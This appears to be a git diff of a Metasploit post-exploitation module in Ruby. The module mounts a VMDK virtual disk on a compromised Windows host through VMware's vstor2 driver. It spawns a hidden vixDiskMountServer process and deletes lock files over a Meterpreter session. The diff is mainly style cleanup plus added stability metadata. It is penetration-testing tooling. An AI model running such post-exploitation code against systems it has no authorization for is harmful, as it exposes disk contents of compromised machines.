@@ -40,6 +40,11 @@ class MetasploitModule < Msf::Post
               stdapi_sys_process_kill
             ]
           }
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => []
         }
       )
     )
@@ -57,8 +62,8 @@ class MetasploitModule < Msf::Post
   def run
     vol = datastore['DRIVE'][0].upcase
     vmdk = datastore['VMDK_PATH']
-    if vol.count("EFGHIJKLMNOPQRSTUVWXYZ") == 0
-      print_error("Wrong drive letter. Choose another one")
+    if vol.count('EFGHIJKLMNOPQRSTUVWXYZ') == 0
+      print_error('Wrong drive letter. Choose another one')
       return
     end
 
@@ -71,15 +76,15 @@ class MetasploitModule < Msf::Post
     # Using stat instead of file? to check if the file exists due to this https://github.com/rapid7/metasploit-framework/issues/8202
     begin
       client.fs.file.stat(vmdk)
-    rescue
+    rescue StandardError
       print_error("File #{vmdk} not found")
       return
     end
 
-    vmware_path = registry_getvaldata("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\vmplayer.exe", "path")
+    vmware_path = registry_getvaldata('HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\vmplayer.exe', 'path')
 
     if vmware_path.nil?
-      print_error("VMware installation path not found.")
+      print_error('VMware installation path not found.')
       return
     end
 
@@ -106,19 +111,19 @@ class MetasploitModule < Msf::Post
       print_error("The drive couldn't be mounted. Check if a .lck file is blocking the access to the vmdk file")
       # Some snapshots could give some problems when are mount in write mode
       if !datastore['READ_MODE']
-        print_status("Try to mount the drive in read only mode")
+        print_status('Try to mount the drive in read only mode')
       end
     end
   end
 
   # Delete the lck file generated after mounting the drive
   def delete_lck(vmdk)
-    lck_dir = vmdk << ".lck"
+    lck_dir = vmdk << '.lck'
     begin
       files = client.fs.dir.entries(lck_dir)
       vprint_status("Directory lock: #{lck_dir}")
     rescue Rex::Post::Meterpreter::RequestError
-      print_status("It was not found a lck directory")
+      print_status('It was not found a lck directory')
       return
     end
 
@@ -130,47 +135,47 @@ class MetasploitModule < Msf::Post
       fd = client.fs.file.open(f_path)
       content = fd.read.to_s
       fd.close
-      if content.include? "vixDiskMountServer"
-        begin
-          client.fs.file.rm(f_path)
-          print_status("Lock file #{f} deleted")
-        rescue ::Exception => e
-          print_error("Unable to remove file: #{e.message}")
-        end
+      next unless content.include? 'vixDiskMountServer'
+
+      begin
+        client.fs.file.rm(f_path)
+        print_status("Lock file #{f} deleted")
+      rescue StandardError => e
+        print_error("Unable to remove file: #{e.message}")
       end
     end
   end
 
   # Recover the device drive name created by vstor2-mntapi20-shared.sys
   def find_vstor2_device
-    reg_services = "HKLM\\SYSTEM\\ControlSet001\\Services\\"
+    reg_services = 'HKLM\\SYSTEM\\ControlSet001\\Services\\'
     devices = registry_enumkeys(reg_services)
     vstor2_key = devices.grep(/^vstor2/)
-    if !vstor2_key.any?
+    if vstor2_key.none?
       print_error("No vstor2 key found on #{reg_services}")
       return
     end
 
-    device_path = registry_getvaldata(reg_services << vstor2_key[0], "ImagePath")
+    device_path = registry_getvaldata(reg_services << vstor2_key[0], 'ImagePath')
 
     if device_path.nil?
-      print_error("No image path found for the vstor2 device")
+      print_error('No image path found for the vstor2 device')
       return
     end
 
     device_name = device_path.split('\\')[-1].split('.')[0]
     print_status("Device driver name found: \\\\.\\#{device_name}")
-    device_name.insert(0, "\\\\.\\")
+    device_name.insert(0, '\\\\.\\')
   end
 
   # Mount the vmdk file by sending a magic control code via DeviceIoControl
   def mount_vmdk(vstore, vmdk_file, vol, read_mode)
     # DWORD value representing the drive letter
-    i = "ABCDEFGHIJKLMNOPQRSTUVWXYZ".index(vol)
+    i = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'.index(vol)
     drive_dword = [(0x00000001 << i)].pack('V')
     vprint_status("DWORD value for drive #{vol}: = #{drive_dword.inspect}")
 
-    ret = session.railgun.kernel32.CreateFileW(vstore, "GENERIC_WRITE|GENERIC_READ", "FILE_SHARE_READ|FILE_SHARE_WRITE", nil, "OPEN_EXISTING", 0, nil)
+    ret = session.railgun.kernel32.CreateFileW(vstore, 'GENERIC_WRITE|GENERIC_READ', 'FILE_SHARE_READ|FILE_SHARE_WRITE', nil, 'OPEN_EXISTING', 0, nil)
     if ret['GetLastError'] != 0
       print_error("Unable to open a handle to the #{vstore} device driver. GetLastError: #{ret['GetLastError']} ")
       return false
@@ -182,7 +187,7 @@ class MetasploitModule < Msf::Post
     fd4 = "\x00\x00\x00\x00"
     fd5 = "\x02\x00\x00\x00"
     fd6 = "\x00\x00\x00\x00"
-    path = (vmdk_file).ljust 260, "\x00"
+    path = vmdk_file.ljust 260, "\x00"
     if read_mode
       fd7 = "\x01\x00\x00\x00"
     else
@@ -192,7 +197,7 @@ class MetasploitModule < Msf::Post
     # The total length of the buffer should be 292
     buffer = fd1 << fd2 << fd3 << fd4 << fd5 << fd6 << drive_dword << path << fd7
 
-    error_code = ""
+    error_code = ''
     tries = 0
     loop do
       ioctl = client.railgun.kernel32.DeviceIoControl(ret['return'], 0x2A002C, buffer, 292, 16348, 16348, 4, nil)
@@ -213,7 +218,7 @@ class MetasploitModule < Msf::Post
 
   # Run the hidden vixDiskMountServer process needed to interact with the driver
   def open_mountserver(path)
-    mount_bin = "vixDiskMountServer.exe"
+    mount_bin = 'vixDiskMountServer.exe'
     if !file?(path << mount_bin)
       print_error("#{mount_bin} not found in \"#{path}\"")
       return false
@@ -226,18 +231,18 @@ class MetasploitModule < Msf::Post
     # On the other hand, if vixDiskMountServer has been created by Meterpreter it would not be necessary to kill
     # the process to run the script again and mount another drive except if you change the mode (write or read only).
     # For this reason, to avoid this case, the process is relaunched automatically.
-    p = session.sys.process.each_process.find { |i| i["name"] == mount_bin }
+    p = session.sys.process.each_process.find { |i| i['name'] == mount_bin }
 
     if p
-      if p["ppid"] != session.sys.process.getpid
+      if p['ppid'] != session.sys.process.getpid
         print_error("An instance of #{mount_bin} is already running by another process")
         return false
       else
         begin
           print_status("Killing the #{mount_bin} instance")
-          session.sys.process.kill(p["pid"])
+          session.sys.process.kill(p['pid'])
           sleep(1)
-        rescue ::Rex::Post::Meterpreter::RequestError => error
+        rescue ::Rex::Post::Meterpreter::RequestError
           print_error("The #{mount_bin} instance depending on Meterpreter could not be killed")
           return false
         end
@@ -248,8 +253,8 @@ class MetasploitModule < Msf::Post
       proc = session.sys.process.execute(path, nil, { 'Hidden' => true })
       sleep(1)
       print_good("Process #{mount_bin} successfully spawned (Pid: #{proc.pid})")
-    rescue ::Rex::Post::Meterpreter::RequestError => error
-      print_error("Binary #{mount_bin} could could not be spawned : #{error.to_s}")
+    rescue ::Rex::Post::Meterpreter::RequestError => e
+      print_error("Binary #{mount_bin} could could not be spawned : #{e}")
       return false
     end
 
